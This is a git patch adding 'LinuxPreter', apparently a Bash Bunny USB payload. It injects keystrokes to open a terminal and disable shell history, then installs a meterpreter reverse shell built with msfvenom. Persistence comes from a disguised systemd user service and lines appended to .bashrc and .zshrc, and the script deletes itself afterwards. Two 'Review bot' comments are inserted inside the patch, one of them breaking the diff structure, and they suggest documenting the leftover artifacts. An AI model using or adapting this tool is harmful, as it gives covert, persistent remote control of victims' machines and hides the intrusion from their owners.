From a4141f73126b41176cb24949f6de6c201b1a9201 Mon Sep 17 00:00:00 2001
From: drapl0n tuxed0 <87269662+drapl0n@users.noreply.github.com>
Date: Sun, 13 Mar 2022 03:57:24 +0530
Subject: [PATCH] Uploaded LinuxPreter (#502) * Uploaded BunnyLogger * uploading payload intel * Create README.md * Update README.md * uploaded LinuxPreter
---
 .../remote_access/LinuxPreter/README.md | 36 ++++++++++++
 .../remote_access/LinuxPreter/payload.sh | 12 ++++
 .../remote_access/LinuxPreter/payload.txt | 56 +++++++++++++++++++
 3 files changed, 104 insertions(+)
 create mode 100644 payloads/library/remote_access/LinuxPreter/README.md
 create mode 100644 payloads/library/remote_access/LinuxPreter/payload.sh
 create mode 100644 payloads/library/remote_access/LinuxPreter/payload.txt
diff --git a/payloads/library/remote_access/LinuxPreter/README.md b/payloads/library/remote_access/LinuxPreter/README.md
new file mode 100644
index 00000000..0a0933a9
--- /dev/null
+++ b/payloads/library/remote_access/LinuxPreter/README.md
@@ -0,0 +1,36 @@
+## About:
+* Title: LinuxPreter
+* Description: Injects meterpreter payload and makes it persistent.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Remote Access
+* Target: Unix-like operating systems with systemd.
+* Attackmodes: HID, Storage
+
+## LinuxPreter injects meterpreter payload, make it persistent and triggers payload on launch of terminal/shell.
+
+### Workflow:
+* Keeping tracks clear by preventing storage of history.
+* Fetching BashBunny's block device and mounting it.
+* Transfering payload script and payload itself.
+* Deleting scripts from victims machine and unmounting bunny.
+
+### Create Meterpreter payload:
+* ```msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf -o sysHandle.bin```
+* NOTE: Only change IP address and Port number in the above command.
+
+### LED Status:
+* `SETUP` : MAGENTA
+* `ATTACK` : YELLOW
+* `FINISH` : GREEN
+
+### Directory Structure of payload components:
+| FileName | Directory |
+| -------------- | ----------------------------- |
+| payload.txt | /payload/switch1/ |
+| payload.sh | /payload/ |
+| sysHandle.bin | /tools/ |
+
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n
diff --git a/payloads/library/remote_access/LinuxPreter/payload.sh b/payloads/library/remote_access/LinuxPreter/payload.sh
new file mode 100644
index 00000000..cfecd2cf
--- /dev/null
+++ b/payloads/library/remote_access/LinuxPreter/payload.sh
@@ -0,0 +1,12 @@
+lol=$(lsblk | grep 1.8G)
+disk=$(echo $lol | awk '{print $1}')
+mntt=$(lsblk | grep $disk | awk '{print $7}')
+mkdir /var/tmp/.system
+cp -r $mntt/tools/sysHandle.bin /var/tmp/.system
+chmod +x /var/tmp/.system/sysHandle.bin
+mkdir -p ~/.config/systemd/user/
+systemctl --user start systemPer.service
+echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/var/tmp/.system/./sysHandle.bin -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemPer.service
+
+echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now systemPer.service \" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now systemPer.service\" >> ~/.bashrc\nfi" > ~/tmmmp
+chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
diff --git a/payloads/library/remote_access/LinuxPreter/payload.txt b/payloads/library/remote_access/LinuxPreter/payload.txt
new file mode 100644
index 00000000..34118624
--- /dev/null
+++ b/payloads/library/remote_access/LinuxPreter/payload.txt
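Review bot: The host footprint of this script is undocumented and contradicts the README's "Deleting scripts from victims machine" line: after the `rm tmmmp` on the last line it still leaves `/var/tmp/.system/sysHandle.bin`, `~/.config/systemd/user/systemPer.service` and the lines appended to `~/.bashrc` / `~/.zshrc` in place, and `/var/tmp` is not cleared on reboot. Add a header comment listing those artifacts so anyone running this on a lab machine knows exactly what to revert and what a defender or EDR will find, e.g. `# Host artifacts left behind: /var/tmp/.system/sysHandle.bin, ~/.config/systemd/user/systemPer.service, lines appended to ~/.bashrc and ~/.zshrc`. The same comment should state that the persistence is a per-user unit (`systemctl --user`), i.e. scoped to the logged-in account rather than system-wide. As a point of style the file also has no shebang even though `payload.txt` executes it directly as `/tmp/./payload.sh`; name the interpreter it expects, `#!/usr/bin/env bash`.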
@@ -0,0 +1,56 @@
+# Title: LinuxPreter
+# Description: Injects meterpreter payload and makes it persistent.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Remote Access
+# Target: Unix-like operating systems with systemd.
+# Attackmodes: HID, Storage
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 2000
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [transfering payload script]
+Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
+Q ENTER
+Q STRING chmod +x /tmp/payload.sh
+Q ENTER
+Q STRING /tmp/./payload.sh
+Q ENTER
+Q DELAY 1000
+Q STRING rm /tmp/payload.sh
+Q ENTER
+Q DELAY 500
+
+# [Unmounting BashBunny]
+Q STRING udisksctl unmount -b /dev/'$disk'
+Q ENTER
+Q DELAY 500
+Q STRING exit
+Q ENTER
+LED FINISH
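Review bot: The header block understates the payload's preconditions: `Q CTRL-ALT t` assumes an unlocked desktop session whose terminal shortcut is that chord, the `udisksctl mount` / `udisksctl unmount` lines require udisks2 to be installed and a session with mount authorization, and the `lsblk | grep 1.8G` line assumes the Bash Bunny is the only block device whose `lsblk` row contains the literal `1.8G`; `# Target: Unix-like operating systems with systemd.` conveys none of this. Add the assumptions to the header so the README's target statement and the code agree, e.g. `# Requires: unlocked graphical session with CTRL-ALT t bound to a terminal, udisks2 (udisksctl), Bash Bunny storage showing as 1.8G in lsblk`. It would also help readers to note next to `Q STRING unset HISTFILE` that this only affects the history file of the shell being typed into, so the `# [Prevent storing history]` label is not a claim about the host's other logging.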